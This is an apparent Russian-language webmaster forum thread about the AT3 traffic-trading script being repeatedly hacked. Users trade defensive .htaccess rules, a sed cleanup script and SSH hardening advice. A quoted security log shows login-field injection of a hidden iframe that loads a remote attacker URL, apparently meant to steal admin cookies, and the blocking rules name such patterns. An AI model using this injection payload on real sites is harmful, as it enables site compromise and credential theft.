Закрывайте админки ат3, опять..

свежачек напихали опять, в файл секьюрити:

Код:

<tr class=row2><td style="white-space: nowrap;">18:22 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range)  tried to login with 'src=http://92.62.101.9/i.php> / </iframe>.</td></tr> <tr class=row2><td style="white-space: nowrap;">18:22 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range)  tried to login with <iframe width=1 height=1 a=" / " b='.</td></tr> <tr class=row2><td style="white-space: nowrap;">18:43 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range)  tried to login with 'src=http://92.62.101.9/i.php> / </iframe>.</td></tr> <tr class=row2><td style="white-space: nowrap;">18:43 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range)  tried to login with <iframe width=1 height=1 a=" / " b='.</td></tr>

билд последний стоит у меня

200.63.46.23 вот этот айпи баним

в последнем билде есть возможность ограничить доступ в админку по айпи

советую такой хтаксес:

Код:

RewriteEngine on RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC,OR] - RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC] + RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC,OR] + RewriteCond %{QUERY_STRING} ^(.*)?iframe(.*)?$ [NC] RewriteRule .* http://google.com/ [L]

"- " и "+ " - убрать, я просто показал что изменилось с последнего редактирования хтаксеса, который я постил в остальных темах форума по этому поводу.

ат3 в последнее время вообще не вызывает доверия в плане безопасности. Насколько знаю, многие из "ру-говорящего" адалта его уже меняют или поменяли на другие другие варианты.

Так вот и хрен-то... Не понимаю, люди продолжают сидеть на этом дырявом и потенциально опасном для сижев скрипте... Ну да, Soft-Com монстр своего дела и помогает закрывать чужие дыры хтакцессами..., но с ат3 только и приходится что заниматься проверкой на "а не подломали ли снова"... Вот как будто делать больше нечего, как проверять постоянно на предмет нового говна на морде сижев...
И я, и не только я, говорили что и новый билд этого ат3 все-равно ломанут, т.к. способы устранения багов у производителя этого скрипта просто смешны! Выйдет новый билд, снова его юзерам придется обновляться, таращиться в админки и смотреть как работает новый билд...

Тут можно только пожелать удачи юзерам ат3..., терпения желать не надо, т.к. и так у них его выше крыши...

Как я понял смысл бага тотже: куки отсылаются когда админ заходит в security log?

Это уже последняя капля! +100 к Project'у

не, на морде ничего не появилось, это только попытка взлома.
к тому же пароль теперь шифрованый в ат3, но лучше все-таки его сменить.
кстати в атх подобного нет, непонятно почему.

ат3 менять не буду , может я и мазохист но, перепробовал все скрипты - ничего не вставило

Цитата:

ат3 менять не буду icon_smile.gif, может я и мазохист но, перепробовал все скрипты - ничего не вставило icon_smile.gif

гонять ботов это не мазохизм это самоуспокоение

так ТС ты не написал - было у тебя ограничение по айпи или не было. т.е. его научились обходить?

usanatol писал:

гонять ботов это не мазохизм это самоуспокоение

ты вот обоснуй свои слова.
в других скриптах я ничего нового не увидел из античита.
ат3 предоставляет достаточно статистики, которой хватает для анализа, плюс свои методы, о которых я писать не буду.

ну и основной показатель - сайны.

Uncle Joe писал:

так ТС ты не написал - было у тебя ограничение по айпи или не было. т.е. его научились обходить?

ограничение по айпи было выключено

Benny писал:

в других скриптах я ничего нового не увидел из античита.

какие ты другие скрипты пробовал помимо атл ?

Цитата:

ты вот обоснуй свои слова. в других скриптах я ничего нового не увидел из античита. ат3 предоставляет достаточно статистики, которой хватает для анализа, плюс свои методы, о которых я писать не буду. ну и основной показатель - сайны.

не знаю какие там методы но at3 и протон моих трейдеров в упор не видят ботов которых ATS показывает запросто и о чем может быть речь когда AT3 не показывает загрузку графики которую больше 80 ботов не грузят хотя и обрабатывают кодированный яваскрипт на котором и основанно большинство античит систем таких скриптов как AT3

а кто сказал, что ат3 показывает мне где бот а где нет, опять между строк читаешь?
ат3 - менеджер трафика, его задача раздавать траф, а не ловить ботов.

Цитата:

а кто сказал, что ат3 показывает мне где бот а где нет, опять между строк читаешь? ат3 - менеджер трафика, его задача раздавать траф, а не ловить ботов.

Ну вот он его и раздает в обмен на ботов. А траф сейчас раздавать умеют практически все кстати на мой взгляд если выкинуть вопрос античита TTT будет получше AT3 и базы там не сыпятся

Stek писал:

ат3 в последнее время вообще не вызывает доверия в плане безопасности. Насколько знаю, многие из "ру-говорящего" адалта его уже меняют или поменяли на другие другие варианты.

Всего лишь надо правильно и грамотно закрыть то, что по определению не должно быть доступно для других.. И проблем не будет абсолютно никаких..

PS. Раз ломают, значит скрипт популярен.. Захотят сломать другие, сломают, был бы прок :-)

DiamonD75 писал:

Всего лишь надо правильно и грамотно закрыть то, что по определению не должно быть доступно для других.. И проблем не будет абсолютно никаких.. PS. Раз ломают, значит скрипт популярен.. Захотят сломать другие, сломают, был бы прок :-)

Ну не все так однозначно...
Просто в ат3 ну вообще по идиотски организованы логи и прочие вещи... Ну на кой хер делать так, что с помощью форм для логина можно втолкнуть в логи ифрейм?! Это вообще уже верх идиотизма! Даже я, не будучи проф. программером не сделал бы такой ерунды... Мало того, с помощью некоторых функций процесса добавления нового трейда можно было записать любой файл в любую директорию... Это-ж ипануцца... Неужели было сложно сделать проверку на допустимые параметры записи? Это же элементарно!
Так а рассматривая их апдэйты просто слезы на глазах наворачиваются... Они не исправляют дыры..., они их просто прикрывают тазом...

И я сильно сомневаюсь, что другие скрипты будет так легко сломать, как ат3... Возможно, но с куда бОльшими затратами времени и сил...

usanatol писал:

Ну вот он его и раздает в обмен на ботов.

мы с тобой что, трейдим? откуда тебе знать что раздает мой скрипт ат3?
еще раз повторяю, за античит у меня отвечает другой скрипт.
да и топик не об этом..

Project писал:

Ну не все так однозначно... Просто в ат3 ну вообще по идиотски организованы логи и прочие вещи... Ну на кой хер делать так, что с помощью форм для логина можно втолкнуть в логи ифрейм?! Это вообще уже верх идиотизма! Даже я, не будучи проф. программером не сделал бы такой ерунды... Мало того, с помощью некоторых функций процесса добавления нового трейда можно было записать любой файл в любую директорию... Это-ж ипануцца... Неужели было сложно сделать проверку на допустимые параметры записи? Это же элементарно! Так а рассматривая их апдэйты просто слезы на глазах наворачиваются... Они не исправляют дыры..., они их просто прикрывают тазом... И я сильно сомневаюсь, что другие скрипты будет так легко сломать, как ат3... Возможно, но с куда бОльшими затратами времени и сил...

Это впихивается не только через логин, но и через in.cgi
Просто ебанутая система обработки запроса ...

-- Оффтоп --
Меня поражает когда все обсирают пхп - типа говноязык ... но на самом деле у говнопрограмистов говноруки ростут из говножопы ...
Доказано кодерами АТ3/АТХ (пишут на С)

Soft-Com писал:

Это впихивается не только через логин, но и через in.cgi Просто ебанутая система обработки запроса ... -- Оффтоп -- Меня поражает когда все обсирают пхп - типа говноязык ... но на самом деле у говнопрограмистов говноруки ростут из говножопы ... Доказано кодерами АТ3/АТХ (пишут на С)

на С пишут скорее для того чтоб код закрыть
а вобще я полгода как перевел все сиджи на атс и нисколько не жалею..
ат3 будут ломать и дальше там ниче несделаеш, та и кто пишетего непонятно
ктото видел чтоб тот прогер хоть раз огдето тписался ?

Блин, никак от этого де..ма не получается отделаться. Позаливал хтаксесы в корень и cgi-bin, прописал в админке доступ только с моего ипа и всеравно, лезет и лезет, что не почищу - снова появляется, пробовал через шелл найти и вычистить все как тут на форуме писали,
сделал файлик sed.sh с кодом

#!/bin/sh
# for fname in `cat report.txt`; do
cat $fname | sed 's/ .*<script> var s.*<\/script> .*//g' > $fname.temp

if [ ! "`cat $fname.temp | md5sum`" = "`cat $fname | md5sum`" ]; then
cat $fname.temp > $fname
fi
rm $fname.temp
done

запускаю и ноль реакции, нету файла report.txt

наверняка чтото не так делаю - не получается. Помогите народ советом, у меня виртуал на Цент ОС. Ато не знаю уж что делать, хоть бери и сноси нах сервер и все снанова ставь.

1. раскоментируй строку
# for fname in `cat report.txt`; do

2. Файл report.txt должен быть у тебя сгенерирован ЕЩЕ до начала запуска скрипта sed.sh - его судя по фсему нужно генерить командой грепайющей файлы на содержание строки ".*<script> var s.*<\/script> .*" - но этом на самом деле неправильно (много сиджеводов делают блоки на яваскрипте на морде сиджа для различных целей, и конструкция var s может быть целиком легитимной)

нифига чтото не выходит, я только что скачал файлы лога сервера, там через каждых 5 секунд вот такая шняга

host sshd(pam_unix)[20266]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=210.66.151.176 user=root

или такая

host sshd(pam_unix)[32594]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ftp.cge.ru

падло ламануть хочет, в жизни повстречал бы - убил бы

это к взлому АТ не имеет никакого отношения

у тебя ssh открыт наружу для всех айпишников.

если это так и нужно, то поставь себе denyhosts - он полечит от таких брутфорс атак.

если нет - то прикрой порт фаерволлом, или сделай по умолчанию deny правило в /etc/hosts.deny для всех кроме себя

Спасибо Soft-Com, я в этом не оч силен, но посоветуюсь с сапортом и чтото решим, а АТЛ буду сносить нах, такого гемора на свою голову мне больше не надо, сомневаюсь что их новые билды если такие и будут чтото решат кардинально.